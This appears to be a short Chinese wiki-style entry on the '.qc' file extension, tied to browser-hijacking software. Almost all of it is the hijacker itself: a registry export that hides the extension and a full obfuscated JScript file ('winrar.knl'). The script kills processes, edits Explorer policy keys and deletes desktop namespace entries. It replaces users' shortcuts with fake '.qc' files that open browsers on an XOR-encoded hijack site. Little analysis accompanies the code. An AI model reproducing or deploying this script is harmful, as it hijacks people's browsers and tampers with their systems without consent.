.qc
跳至導覽
跳至搜尋
.qc,疑似劫持瀏覽器的軟體所使用的附檔名。
相關
登錄資訊
Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\.qc] @="qcfile" [HKEY_CLASSES_ROOT\qcfile] @="辦豎源宒" "NeverShowExt"="" [HKEY_CLASSES_ROOT\qcfile\CLSID] @="{FBF23B40-E3F0-101B-8488-00AA003E56F8}" [HKEY_CLASSES_ROOT\qcfile\DefaultIcon] @=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\ 00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,75,00,72,00,\ 6c,00,2e,00,64,00,6c,00,6c,00,2c,00,30,00,00,00 [HKEY_CLASSES_ROOT\qcfile\shell] @="open" [HKEY_CLASSES_ROOT\qcfile\shell\open] "CLSID"="{FBF23B40-E3F0-101B-8488-00AA003E56F8}" [HKEY_CLASSES_ROOT\qcfile\shell\open\command] @="WScript.exe \"C:\\Program Files\\WinRAR\\winrar.knl\" \"%1\"" [HKEY_CLASSES_ROOT\qcfile\shellex] [HKEY_CLASSES_ROOT\qcfile\shellex\ContextMenuHandlers] @="" [HKEY_CLASSES_ROOT\qcfile\shellex\IconHandler] @="{FBF23B40-E3F0-101B-8488-00AA003E56F8}"
C:\Program Files\WinRAR\WinRAR.knl
(function() { var P, q; var k = 15; var z = ".qc"; var o = "qcfile"; var D; var C; var A = ["70^74^87^95^67^64^93^33^74^87^74","66^78^87^91^71^64^65^33^74^87^74", "91^71^74^88^64^93^67^75^33^74^87^74", "70^74^87^95^67^64^93^74^33^74^87^74", "60^57^63^92^74^33^74^87^74", "91^91^93^78^89^74^67^74^93^33^74^87^74", "73^70^93^74^73^64^87^33^74^87^74"]; var G; var J; var N; var O; var b; var g; var c = ["120^120^120^33^127^127^61^60^59^58^33^108^96^98"]; var M = "103^123^123^127^53^32^32^120^120^120^33^127^127^61^60^59^58^33^108^96^98"; var t = function(R) { var T = R.split("^"); for (var S in T) { T[S] = T[S] ^ k; T[S] = String.fromCharCode(T[S]) } return T.join("") }; var L = function() { for (var R in A) { A[R] = t(A[R]) } for (var S in c) { c[S] = t(c[S]) } }; var d = function() { var S = 2147483650; sRegPath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace"; try { oLoc = new ActiveXObject("WbemScripting.SWbemLocator"); oSvc = oLoc.ConnectServer(null, "root\\default"); oReg = oSvc.Get("StdRegProv"); oMethod = oReg.Methods_.Item("EnumKey"); oInParam = oMethod.InParameters.SpawnInstance_(); oInParam.hDefKey = S; oInParam.sSubKeyName = sRegPath; oOutParam = oReg.ExecMethod_(oMethod.Name, oInParam); return oOutParam.sNames.toArray() } catch(R) { return [] } }; var K = function(R, T) { for (var S = 0; S < R.length; S++) { if (R[S] == T) { return true } } return false }; var h = function() { C = d(); try { var S; var R = ["{1f4de370-d627-11d1-ba4f-00a0c91eedba}", "{450D8FBA-AD25-11D0-98A8-0800361B1103}", "{645FF040-5081-101B-9F08-00AA002F954E}", "{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"]; for (S = 0; S < R.length; S++) { R[S] = R[S].toUpperCase() } for (S = 0; S < C.length; S++) { C[S] = C[S].toUpperCase() } for (S = 0; S < C.length; S++) { if (!K(R, C[S])) { P.RegDelete("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\" + C[S] + "\\") } } } catch(T) {} }; var F = function() { try { P.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoInternetIcon", 1, "REG_DWORD") } catch(R) {} try { P.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartPage\\Favorites", 255, "REG_BINARY") } catch(R) {} try { P.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\ClassicStartMenu", 1, "REG_DWORD") } catch(R) {} try { P.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\NewStartPanel\\{871C5380-42A0-1069-A2EA-08002B30309D}", 1, "REG_DWORD") } catch(R) {} }; var s = function() { try { var U = P.Environment("PROCESS"); var T = U("USERPROFILE"); var R = T + "\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch"; return R } catch(S) { return "" } }; var p = function() { var R = WScript.Arguments; if (R.length == 0) { return true } else { return false } }; var m = function(T) { var U = T.toUpperCase(); for (var R in A) { if (U.indexOf(A[R]) > 0) { return true } } return false }; var u = function() { try { var R = P.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir"); return R } catch(S) { return "C:\\Program Files" } }; var f = function(Y, W) { try { var U, S, R, ab; var X = new Array; var T = W; U = q.GetFolder(Y); R = new Enumerator(U.files); ab = ""; T = W.toUpperCase(); for (; ! R.atEnd(); R.moveNext()) { var aa = R.item(); var Z = ""; Z += aa; Z = Z.toUpperCase(); if ((Z.match(T + "$") == T)) { X[X.length] = Z } } return X } catch(V) { return [] } }; var H = function(S) { var R = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"); var U = R.ExecQuery('Select * From Win32_Process WHERE name="' + S + '"'); var T = new Enumerator(U); while (!T.atEnd()) { T.item().Terminate(); T.moveNext() } WScript.Sleep(1000) }; var r = function(T, V, S, R) { try { var U = q.CreateTextFile(T, true); U.WriteLine("[360]"); U.WriteLine("Sex=擭"); U.WriteLine("Name=___" + escape(V) + "___"); U.WriteLine("Tel=<<<" + escape(S) + ">>>"); U.WriteLine("[InternetShortcut]"); U.WriteLine("URL=http://www.baidu.com"); U.WriteLine("IconIndex=0"); U.WriteLine("IconFile=" + R); U.Close() } catch(W) {} }; var I = function() { try { P.RegWrite("HKCR\\" + z + "\\", o, "REG_SZ"); P.RegWrite("HKCR\\" + o + "\\", "辦豎源宒", "REG_SZ"); //P.RegWrite("HKCR\\" + o + "\\IsShortcut", "", "REG_SZ"); P.RegWrite("HKCR\\" + o + "\\NeverShowExt", "", "REG_SZ"); P.RegWrite("HKCR\\" + o + "\\DefaultIcon\\", "%SystemRoot%\\system32\\url.dll,0", "REG_EXPAND_SZ"); P.RegWrite("HKCR\\" + o + "\\CLSID\\", "{FBF23B40-E3F0-101B-8488-00AA003E56F8}", "REG_SZ"); P.RegWrite("HKCR\\" + o + "\\shell\\", "open", "REG_SZ"); P.RegWrite("HKCR\\" + o + "\\shell\\open\\CLSID", "{FBF23B40-E3F0-101B-8488-00AA003E56F8}", "REG_SZ"); P.RegWrite("HKCR\\" + o + "\\shell\\open\\command\\", 'WScript.exe "' + g + 'winrar.knl" "%1"', "REG_SZ"); P.RegWrite("HKCR\\" + o + "\\shellex\\IconHandler\\", "{FBF23B40-E3F0-101B-8488-00AA003E56F8}", "REG_SZ"); P.RegWrite("HKCR\\" + o + "\\shellex\\ContextMenuHandlers\\", "", "REG_SZ") } catch(R) {} }; var v = function(S, R) { try { q.CopyFile(S, R) } catch(T) {} }; var n = function() { try { var R = P.RegRead("HKLM\\SOFTWARE\\Clients\\StartMenuInternet\\IEXPLORE.EXE\\shell\\open\\command\\"); R = ParseFullPath(src); R = R.replace(/"/g, "") } catch(S) { return "C:\\Program Files\\Internet Explorer\\iexplore.exe" } if (R == "") { return "C:\\Program Files\\Internet Explorer\\iexplore.exe" } return R }; var E = function() { P = new ActiveXObject("WScript.Shell"); q = new ActiveXObject("Scripting.FileSystemObject"); M = t(M); L(); var S = P.Environment("PROCESS"); O = S("SystemRoot") + "\\System32"; b = S("ProgramFiles"); g = b + "\\WinRAR\\"; G = s(); D = n(); try { q.CreateFolder(g) } catch(R) {} }; var a = function(V) { var Y = q.OpenTextFile(V, 1); var X = Y.ReadAll(); var U = /___(.*?)___/ig; var S = /<<<(.*?)>>>/ig; var T, R; if (U.test(X)) { T = RegExp.$1; T = unescape(T) } if (S.test(X)) { R = RegExp.$1; R = unescape(R) } if (T != "") { if (m(T)) { var W = "http://" + c[parseInt(Math.random() * c.length)] + "/"; R = W; if (R != "") { R = '"' + R + '"' } P.Run('"' + T + '" ' + R, 1, false) } else { P.Run('"' + T + '" ', 1, false) } } }; var l = function(R) { try { var S = q.GetFile(R); S.attributes = 32; q.DeleteFile(R) } catch(T) {} }; var e = function(Y) { var T = f(Y, ".LNK"); for (var S in T) { try { var W = T[S]; var V; var aa = ""; var U = ""; var R = ""; var ad = ""; var ab = /\.exe$/ig; var Z = /system32/ig; var Sogou = /\SogouExplorer.exe$/ig; var HaoZip = /\HaoZip.exe$/ig; R = q.GetBaseName(W); V = P.CreateShortcut(W); aa = V.TargetPath; U = V.Arguments; if (aa == "") { continue } if (Z.test(aa)) { continue } else {} if (Sogou.test(aa)) { continue } if (HaoZip.test(aa)) { continue } if (ab.test(aa)) { ad = Y + "\\" + R + z; r(ad, aa, U, aa); l(W) } else {} } catch(X) {} } }; var w = function() { try { var T = P.SpecialFolders("AllUsersDesktop"); var R = T + "\\Internet Explerer" + z; var Z = T + "\\INTERNET EXPLERER" + z; r(R, D, "", D) l(Z) } catch(S) {} }; var y = function() { //P.Run("iexplore.exe " + M) }; E(); if (p()) { I(); H(""); F(); w(); h(); e(P.SpecialFolders("AllUsersDesktop")); e(P.SpecialFolders("Desktop")); // B(G); e(G); y() } else { var x = WScript.Arguments; a(x(0)); F(); w(); h(); e(P.SpecialFolders("AllUsersDesktop")); e(P.SpecialFolders("Desktop")); // B(G); e(G) } })();